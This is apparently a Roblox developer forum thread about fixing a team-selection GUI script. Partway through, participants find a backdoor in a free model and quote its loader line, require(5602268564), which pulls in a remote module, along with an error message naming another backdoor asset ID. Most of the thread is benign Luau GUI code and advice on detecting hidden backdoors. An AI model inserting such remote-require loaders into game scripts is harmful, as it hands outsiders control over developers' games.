This is a virus, delete it immediately, and don’t test!
What in the world, I have never seen that ,and I check for those types of things.
I don’t think there’s anything wrong with your code, you should probably use visible though
script.Parent.MouseButton1Click:Connect(function()
script.Parent.Parent.Parent.Parent.Parent.Visible= false
end)
It’s ok free models always have a problem with trust, so check your output because I was scrolling for errors from your server script
That is a virus. It calls require() in hidden with getfenv, and then types the assetid. Requiring the virus module
OP was using Server script to control the Ui
ik, I just saw that virus thing and rushed to tell, forgot about the whole post
Oh wow, make sure to see if TestService has something in it, it shouldn’t, and that’s usually where they hide.
Well well look what we found…
Script:
require(5602268564)
… Dude that is legit awful. I am so sorry.
Tiny bit suspicious. Maybe just a little. Hopefully Roblox cracks down this and bans it.
It’s ok man, also on one note, make sure u chech ur output because some modules and backdoors liek this get caught
messages should ook like this
Unable to find module for asset id 4834963944. Does the asset have a ModuleScript named "MainModule"? - Server - Debounce:290
and they usually try to say stuff like “we are roblox”
But anyways I still need help on my thing heres is my current version im using, and it still isnt working and yes its virus free now Give.rbxl (139.8 KB)
I don’t wanna click that lol
I’ll make a example GUI for you though.
Heres my scripts.
script.Parent.MouseButton1Click:Connect(function()
game.Players.LocalPlayer.PlayerGui.TeamChooser.KidsSelection.Visible = true
game.Players.LocalPlayer.PlayerGui.TeamChooser.TeensSelection.Visible = true
game.Players.LocalPlayer.PlayerGui.TeamChooser.ParentsSelection.Visible = true
game.Players.LocalPlayer.PlayerGui.TeamChooser.ChooseTeam.Visible = true
game.Players.LocalPlayer.PlayerGui.TeamChooser.ChooseTeam.TextLabel.Visible = true
end)
local gui = script.Parent
local player = script.Parent.Parent.Parent
for _, child in pairs(script.Parent:GetChildren())do
local index = child.Name:find("Selection")
--if the child is a team selection button:
if index then
local teamName = child.Name:sub(1, index-1)
print(teamName)
child.MouseButton1Click:connect(function()
player.Team = game:GetService("Teams"):FindFirstChild(teamName)
gui.KidsSelection.Visible = false
gui.TeensSelection.Visible = false
gui.ParentsSelection.Visible = false
gui.ChooseTeam.Visible = false
gui.ChooseTeam.TextLabel.Visible = false
end)
end
end
It won’t let me open it for some reason, it keeps asking me what I want to open it with? Usually it says .rblx your says .rbxm
If You could just send screenshots of what you made instead because it doesnt seem to wanna let me open it
Oh thats my bad, sorry about that…